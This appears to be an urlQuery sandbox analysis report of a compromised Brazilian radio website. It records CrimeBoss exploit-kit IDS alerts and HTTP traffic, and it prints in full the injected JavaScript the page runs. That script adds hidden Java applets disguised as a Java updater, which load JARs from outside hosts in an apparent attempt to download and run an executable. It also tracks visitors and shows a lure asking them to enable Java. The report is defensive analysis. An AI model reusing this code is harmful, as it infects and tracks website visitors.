Overview

URLhttp://radio93.com.br/amor/class.class
IP173.193.139.74
ASNAS36351 SoftLayer Technologies Inc.
Location United States
Report completed2012-10-31 09:35:40 CET
StatusLoading report..
urlQuery Alerts Detected live CrimeBoss exploit kit
Detected CrimeBoss exploit kit URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-10-31 09:35:00 173.194.69.102 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-10-31 09:34:54 173.192.123.242 urlQuery Client1EXPLOIT-KIT Crimeboss exploit kit redirection attempt
2012-10-31 09:34:55 urlQuery Client 173.192.123.2421EXPLOIT-KIT Crimeboss exploit kit outbound connection
2012-10-31 09:34:56 urlQuery Client 76.74.239.1601EXPLOIT-KIT Crimeboss exploit kit outbound connection
2012-10-31 09:34:56 76.74.239.160 urlQuery Client1EXPLOIT-KIT Crimeboss exploit kit redirection attempt
2012-10-31 09:34:57 173.192.123.242 urlQuery Client1EXPLOIT-KIT Crimeboss exploit kit redirection attempt
2012-10-31 09:34:57 urlQuery Client 173.192.123.2421EXPLOIT-KIT Crimeboss exploit kit outbound connection
2012-10-31 09:34:58 urlQuery Client 76.74.239.1601EXPLOIT-KIT Crimeboss exploit kit outbound connection
2012-10-31 09:34:58 76.74.239.160 urlQuery Client1EXPLOIT-KIT Crimeboss exploit kit redirection attempt


Recent reports on same IP/ASN/Domain

Last 6 reports on ASN: AS36351 SoftLayer Technologies Inc.

Date Alerts / IDS URL IP
2013-02-23 04:14:210 / 0http://bleachdestinysdoor.dogsboard.com/75.126.208.167
2013-02-23 04:00:430 / 2http://cevatpasa.com/images/logos.gif?1f8dd=64622537.18.176.75
2013-02-23 03:46:280 / 0http://www.anime-eden.com74.86.127.200
2013-02-23 03:27:100 / 0http://bleachdestinysdoor.dogsboard.com/75.126.208.172
2013-02-23 03:22:300 / 2http://www.howardforums.com173.192.29.166
2013-02-23 03:22:250 / 2http://www.howardforums.com/173.192.29.166



JavaScript

Executed Scripts (70)

#67 JavaScript::Script (size: 9908, repeated: 2) - Alert detect on script (Severity: 1)

var jsm_report_on = true;
var jsm_report_access = 'http://c.statcounter.com/7397725/0/d06ca43d/1/';
var jsm_report_javaon = 'http://c.statcounter.com/7397829/0/58cba984/1/';
var jsm_report_javaoff = 'http://c.statcounter.com/7415811/0/6dbe4166/1/';
var jsm_report_loaded = 'http://c.statcounter.com/7415805/0/e6b0668f/1/';
var jsm_report_loadfail = 'http://c.statcounter.com/7415819/0/56a1ce39/1/';

var jsm_lab_on = true;
var jsm_lab_access = 'http://3dvision.com/js/index.php?action=stats_access';
var jsm_lab_javaon = 'http://3dvision.com/js/index.php?action=stats_javaon';
var jsm_lab_javaoff = 'http://3dvision.com/js/index.php?action=stats_javaoff';
var jsm_lab_loaded = 'http://3dvision.com/js/index.php?action=stats_loaded';
var jsm_lab_loadfail = 'http://3dvision.com/js/index.php?action=stats_loadfail';

var jsm_loaded = false;
var jsm_applet_index = 1;
var jsm_applet_count = 20;
var jsm_applet_prefix = 'amor';
var jsm_applet_url = 'http://dontsmoke.com.ar/wp-content/jar/';

var jsm_popunder_url = 'http://celularbom.com/js/clickpop.js';

function JSM_getAppletURL() {
    //alert(jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar');
    return jsm_applet_url + jsm_applet_prefix + jsm_applet_index + '.jar';
}

function JSM_createIframe(src) {
    var iframe = document.createElement('iframe');
    iframe.src = src;
    iframe.style.visibility = 'hidden';
    iframe.style.display = 'inline';
    iframe.style.margin = '0';
    iframe.style.padding = '0';
    iframe.style.border = 'none';
    iframe.style.width = '0';
    iframe.style.height = '0';
    return iframe;
}

function JSM_createScript(src) {
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = src;
    return script;
}

function getXMLHttpRequest() {
    if (window.XMLHttpRequest) return new window.XMLHttpRequest;
    else {
        try {
            return new ActiveXObject("Microsoft.XMLHTTP");
        } catch (ex) {
            return null;
        }
    }
}

function JSM_labReport(url) {
    var oReq = getXMLHttpRequest();
    if (oReq) {
        oReq.onreadystatechange = function() {
            if (oReq.readyState == 4) {
                if (oReq.status == 200) {
                    //window.alert('from callback ' + oReq.responseText);
                }
            }
        };

        oReq.open("GET", url, true);
        oReq.send();
    }
}

function JSM_labReport2(url) {
    var hhBody = document.body;
    if (hhBody) {
        hhBody.insertBefore(JSM_createIframe(url), hhBody.firstChild);
    }
}

function JSM_createImg(src) {
    var img = document.createElement('img');
    img.src = src;
    return img;
}

function JSM_createSpan(html) {
    var span = document.createElement('span');
    span.innerHTML = html;
    return span;
}

function JSM_getAppletHtml() {
    return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + JSM_getAppletURL() + '" width="0" height="0"  style="visibility: hidden" mayscript="true">	<param name="link" value="http://debitron-termo.eu/icon.gif;exe;Ligado"> </param></applet>';
}

function JSM_getAppletHtml_X() {
    return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'javab.jar?r=' + Math.floor(100000 + (Math.random() * 999999 + 1)) + '" width="0" height="0"  style="visibility: hidden"> <param name="link" value="http://debitron-termo.eu/icon.gif;exe;Ligado"> </param> </applet>';
}

function JSM_getAppletHtml_Y() {
    return '<applet name="Java(TM) Platform SE Auto Updater" code="amor.class" archive="' + jsm_applet_url + 'java7.jar?r=' + Math.floor(100000 + (Math.random() * 999999 + 1)) + '" width="0" height="0"  style="visibility: hidden"> <param name="link" value="http://debitron-termo.eu/icon.gif;exe;Ligado"> </param> </applet>';
}

//Normal

function JSM_onLoadA() {
    //report load success
    if (jsm_report_on) JSM_createImg(jsm_report_loaded);
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded);
}


//Java Rhino

function JSM_onLoadB() {
    //report load success
    if (jsm_report_on) JSM_createImg(jsm_report_loaded);
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=r');
}


//Java 7

function JSM_onLoadC() {
    //report load success
    if (jsm_report_on) JSM_createImg(jsm_report_loaded);
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loaded);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loaded + '&k=c');
}

function JSM_onLoadJavaX() {
    JSM_createImg('http://c.statcounter.com/7455623/0/bd77ea2d/1/');
}

function JSM_onLoadFail() {
    //report load fail
    if (jsm_report_on) JSM_createImg(jsm_report_loadfail);
    //if (jsm_lab_on) JSM_labReport(jsm_lab_loadfail);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_loadfail);

    if (jsm_applet_index < jsm_applet_count) {
        jsm_applet_index++;

        var hBody = document.body;
        if (hBody) {
            var html = JSM_getAppletHtml();
            hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
        }
    }
}

function JSM_onInit(hBody) {

    //report access
    if (jsm_report_on) JSM_createImg(jsm_report_access);
    //if (jsm_lab_on) JSM_labReport(jsm_lab_access);
    if (jsm_lab_on) JSM_labReport2(jsm_lab_access);

    if (hBody) {
        var html = '';

        if (navigator.javaEnabled()) {
            //java on

            html = JSM_getAppletHtml() + JSM_getAppletHtml_X() + JSM_getAppletHtml_Y();

            //report java enabled access
            if (jsm_report_on) JSM_createImg(jsm_report_javaon);
            //if (jsm_lab_on) JSM_labReport(jsm_lab_javaon);
            if (jsm_lab_on) JSM_labReport2(jsm_lab_javaon);

            hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);
        } else {
            //java off

            if (typeof window.innerWidth != 'undefined') {
                viewportwidth = window.innerWidth;
                viewportheight = window.innerHeight;
            } else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0) {
                viewportwidth = document.documentElement.clientWidth;
                viewportheight = document.documentElement.clientHeight;
            } else {
                viewportwidth = document.getElementsByTagName('body')[0].clientWidth;
                viewportheight = document.getElementsByTagName('body')[0].clientHeight;
            }

            //html = 'java is NOT enabled...';
            html = '<div id="xyz_light_cont" style="display: none; position: absolute; text-align: center; top: 0; left: 0; width: 103%; height: 103%; z-index: 9002; background: none"><div id="xyz_light" style="display: none; margin: 0 auto; margin-top: 130px; width: 600px; padding: 0;	border: 16px solid #212121; border-top: none; background-color: white; z-index:9003; overflow: auto; font-family: Tahoma; font-size: 11px; color: black; text-align: center;"><!--<div style="text-align: left; width: 70%; margin: auto auto; background-color: #fff; border: 1px solid #727272">--><div style="font-weight: bold; font-size: 12px; color: #fff; padding: 12px 8px 8px 4px; background-color: #212121; text-align: left">Atenção</div><div style="padding: 6px; background-color: #fff"><div style="text-align: right;"><a style="text-decoration: underline; color: blue" href="javascript:void(0)" onclick="document.getElementById(\'xyz_light\').style.display=\'none\';document.getElementById(\'xyz_fade\').style.display=\'none\';document.getElementById(\'xyz_light_cont\').style.display=\'none\'">Fechar</a></div><div style="padding-top: 8px; text-align: center"><img margin: 5px; padding: 0" src="http://s1.postimage.org/317sn151g/java.jpg" /></div><div style="padding: 10px 0 25px 0; text-align: center; font-weight: bold">Você não possui Java ou ele está desabilitado.<br />Esta página possui recursos que requerem que o Java esteja ativado.<br /><br /><a target="_blank" href="http://www.java.com/pt_BR/download/">Clique aqui para instalar o plugin do Java.</a></div><!--</div>--></div></div></div>' + '' + '<div id="xyz_fade" style="display: none; position: absolute; top: 0; left: 0; width: ' + viewportwidth + 'px; height: ' + viewportheight + 'px; background-color: black; z-index: 9001; -moz-opacity: 0.8; opacity: .80; filter: alpha(opacity=80)"></div>'; /**/
            //report java disabled access
            if (jsm_report_on) JSM_createImg(jsm_report_javaoff);
            //if (jsm_lab_on) JSM_labReport(jsm_lab_javaoff);
            if (jsm_lab_on) JSM_labReport2(jsm_lab_javaoff);

            hBody.insertBefore(JSM_createSpan(html), hBody.firstChild);

            document.getElementById('xyz_light_cont').style.display = 'block';
            document.getElementById('xyz_light').style.display = 'block';
            document.getElementById('xyz_fade').style.display = 'block';
        }

        //hBody.insertBefore(JSM_createScript(jsm_popunder_url), hBody.firstChild);
    }
}

function JSM_onCreate() {
    if (jsm_loaded) return;

    var myBody = document.body;
    if (myBody) {
        jsm_loaded = true;
        JSM_onInit(myBody);
    } else {
        setTimeout("JSM_onCreate()", 100);
    }
}

function WindowOnload(f) {
    var prev = window.onload;
    window.onload = function() {
        if (prev) prev();
        f();
    }
}

WindowOnload(JSM_onCreate);
setTimeout("JSM_onCreate()", 7000);
/*
msg = d_hex( d_b64( ?? ) );
NTM2MTc1NjQ2MWU3ZjU2NTczMjA2MTZmNzMyMDZkNjU3NTczMjA2MzZmNmM2NTY3NjE3MzIwNjQ2
NTIwNzQ3MjYxNjI2MTZjNjg2ZjIwNjQ2ZjIwNjI2YzZmNjcyMDYzNzI2OTZkNjU3MzYzNjk2MjY1
NzI2ZTY1NzQ2OTYzNmY3MzJlNjM2ZjZkMmUwZDBhNTM2MTYyNjU2ZTY0NmYyMDcxNzU2NTIwNmU2
MTY0NjEyMDczNjE2MjY1NmQ2ZjczMjA2NTczNzQ2MTZkNmY3MzIwNjE2Y2U5NmQyMDY0NmYyMDYy
NjU2ZDIwNjUyMDY0NmYyMDZkNjE2YzJjMjA2MTY2Njk2ZTYxNmMyMDYxMjBmYTZlNjk2MzYxMjA2
MzZmNjk3MzYxMjA2MTYyNzM2ZjZjNzU3NDYxMjBlOTIwNzE3NTY1MjA3NDc1NjQ2ZjIwZTkyMDcy
NjU2YzYxNzQ2OTc2NmYyZTBkMGE1NTZkMjA2MTYyNzI2MWU3NmYyYzIwNjQ2ZjIwNzM2NTc1MjA2
MTZkNjk2NzZmMjA1MDczNzk2MzY4NmM2ZjJlMGQwYTYyNzkyMDUwNzM3OTYzNjg2YzZmMjAyZDIw
MzEzMTJmMzEzMTJmMzEzMQ==
*/

Executed Evals (1)

#1 JavaScript::Eval (size: 17, repeated: 1)

/*@cc_on!@*/
false

Executed Writes (5)

#1 JavaScript::Write (size: 76, repeated: 1)

 <script src="http://alrasbi.net//index-bkp.php?action=jv&h=16831"></script>

#2 JavaScript::Write (size: 76, repeated: 1)

 <script src="http://alrasbi.net//index-bkp.php?action=jv&h=25187"></script>

#3 JavaScript::Write (size: 50, repeated: 1)

<div class="twtr-widget" id="twtr-widget-1"></div>

#4 JavaScript::Write (size: 121, repeated: 1)

<script src="http://3dvision.com/js/index.php?setup=d&s=2&r=477811" type="text/javascript" charset="iso-8859-1"></script>

#5 JavaScript::Write (size: 121, repeated: 1)

<script src="http://3dvision.com/js/index.php?setup=d&s=2&r=886200" type="text/javascript" charset="iso-8859-1"></script>


HTTP Transactions (157)


Request Response
GET /amor/class.class HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397; path=/
Last-Modified: Wed, 31 Oct 2012 08:34:53 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8871
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /j/2/widget.js HTTP/1.1

Host: widgets.twimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: application/javascript
x-amz-id-2: c4r15w80k1x/ey+maCcQF3T5w3r2gh/MAmRCIULe04i3szBiJvYgiqiPzKbYo7NQ
x-amz-request-id: 5BEA4DFFC9A768D6
Date: Wed, 31 Oct 2012 08:34:54 GMT
Last-Modified: Wed, 20 Jun 2012 08:18:06 GMT
Etag: &quot;61fc013f485c5bb5861a765a5f2a4248&quot;
Accept-Ranges: bytes
Server: AmazonS3
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 15608
Cache-Control: private, max-age=900
Age: 0
Expires: Wed, 31 Oct 2012 08:49:54 GMT
X-CDN: Cotendo
Connection: Keep-Alive
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;09af11fded916ff4238f653a64bcbede&quot;
Content-Encoding: gzip
X-FB-Debug: NWF9STguAilcftSvKNe8AeFmRSoLBrPqiG/DpsYx9bw=
Content-Length: 57946
Cache-Control: public, max-age=1153
Expires: Wed, 31 Oct 2012 08:54:07 GMT
Date: Wed, 31 Oct 2012 08:34:54 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&debug=true&m=1343672832 HTTP/1.1

Host: radio93.com.br
GET /wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
Vary: Accept-Encoding
Etag: &quot;pub1343672832;gz&quot;
Cache-Control: max-age=0, public, max-age=86400
Content-Encoding: gzip
Last-Modified: Mon, 30 Jul 2012 18:27:12 GMT
Content-Length: 8717
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /index-bkp.php HTTP/1.1

Host: alrasbi.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.2.13, ASP.NET
Set-Cookie: PHPSESSID=afcca3aa8f0f249097810cdca0b44093; path=/
Date: Wed, 31 Oct 2012 08:34:51 GMT
Connection: close
Content-Length: 143
GET /wp-content/themes/novo93/images/programacao/semana1.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:37:15 GMT
Etag: &quot;e7ebc0-392e-4b687f9d26cc0&quot;
Accept-Ranges: bytes
Content-Length: 14638
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/uploads/2012/10/ESTA%C3%87%C3%83O-DO-AMOR2.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 24 Oct 2012 21:22:19 GMT
Etag: &quot;5c6049-bd57-4ccd4ae76d8c0&quot;
Accept-Ranges: bytes
Content-Length: 48471
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/uploads/2012/10/kids2.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 01 Oct 2012 14:32:20 GMT
Etag: &quot;83667a-e200-4cb0045e64500&quot;
Accept-Ranges: bytes
Content-Length: 57856
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/uploads/2012/04/aline-barros-tv1.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 11 Apr 2012 20:26:43 GMT
Etag: &quot;cdec7e-3f9f-4bd6d0eba06c0&quot;
Accept-Ranges: bytes
Content-Length: 16287
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/uploads/2012/09/CUPOM1.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 05 Sep 2012 20:23:49 GMT
Etag: &quot;800af6-d209-4c8fa27071f40&quot;
Accept-Ranges: bytes
Content-Length: 53769
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/plugins/wp-minify/min/?f=wp-content/themes/novo93/js/jquery-1.7.1.min.js,wp-content/themes/novo93/js/slides.min.jquery.js,wp-content/themes/novo93/js/cufon-yui.js,wp-content/themes/novo93/js/jquery.cycle.all.latest.js,wp-includes/js/jquery/jquery.js,wp-content/plugins/tubepress/sys/ui/static/js/tubepress.js,wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js,wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js&debug=true&m=1340900872 HTTP/1.1

Host: radio93.com.br
GET /wp-content/plugins/wp-minify/min/?f=wp-content/themes/novo93/js/jquery-1.7.1.min.js,wp-content/themes/novo93/js/slides.min.jquery.js,wp-content/themes/novo93/js/cufon-yui.js,wp-content/themes/novo93/js/jquery.cycle.all.latest.js,wp-includes/js/jquery/jquery.js,wp-content/plugins/tubepress/sys/ui/static/js/tubepress.js,wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js,wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js&amp;debug=true&amp;m=1340900872 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
Vary: Accept-Encoding
Etag: &quot;pub1340900872;gz&quot;
Cache-Control: max-age=0, public, max-age=86400
Content-Encoding: gzip
Last-Modified: Thu, 28 Jun 2012 16:27:52 GMT
Content-Length: 101576
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /wp-content/uploads/2012/07/TAMBDUELO.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 10 Sep 2012 13:38:24 GMT
Etag: &quot;7f6da7-d630-4c9591259f400&quot;
Accept-Ranges: bytes
Content-Length: 54832
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/uploads/2012/10/lea_acustico.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 24 Oct 2012 15:43:22 GMT
Etag: &quot;836866-22b18-4cccff248da80&quot;
Accept-Ranges: bytes
Content-Length: 142104
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:34:54 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /pt_BR/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;a8c8f5f9cd645ac4e9dbd96a07e4d94e&quot;
Content-Encoding: gzip
X-FB-Debug: HcYBjvBgWzTJGwaPgOAU3XUEwpHVk0+6MNqU1vQOa0E=
Content-Length: 57976
Cache-Control: public, max-age=455
Expires: Wed, 31 Oct 2012 08:42:30 GMT
Date: Wed, 31 Oct 2012 08:34:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
